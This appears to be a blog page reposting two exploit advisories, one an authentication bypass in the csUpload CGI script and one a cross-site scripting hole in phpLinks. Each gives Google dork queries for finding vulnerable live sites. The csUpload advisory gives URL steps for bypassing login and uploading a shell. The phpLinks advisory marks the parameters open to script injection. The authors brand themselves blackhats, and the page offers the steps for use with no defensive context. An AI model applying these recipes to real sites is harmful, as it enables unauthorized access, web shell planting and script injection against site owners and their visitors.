Wednesday, February 10, 2016

csUpload Script Site Authentication Bypass!

Google Dork:CSUpload.cgi?command=

Date:4/9/2014
Exploit Author:Satanic2000
Vendor Homepage:http://www.cgiscript.net
Software Link:http://www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command=viewone&id=12
Tested on:linux

Exploit:

vuln:
Site.com/[path]/CSUpload/CSUpload.cgi[path] :/cgi-script/ or /cgi-bin/ or None

Example:

1- http://localhost/cgi-bin/CSUpload//CSUpload.cgi?command=login

2- Bypass Authentication http://localhost/cgi-bin/CSUpload/CSUpload.cgi

3- Select Database Select Databases And Upload (File,Or Shell)

Thanks :-)

Posted by at No comments:
Labels:

PhpLinks Cross Site Scripting Vulnerability!

Author: Arsan
Date:15 September,2013
Author email:Arsan.Blackhat@gmail.com
Author Twitter: @ArsanBlackhat
Vendor Homepage: www.newphplinks.com
Version : All Version
Tested on: Linux & Windows
Category: webapps

Google Keywords:  inurl:”/index.php?PID=” intext:”Powered By phpLinks”

Exploits:
http://127.0.0.1:8081/index.php?PID=[XSS]
Or
http://127.0.0.1:8081/[XSS In SearchBox]

Posted by at No comments:
Labels: ,
Subscribe to: Posts (Atom)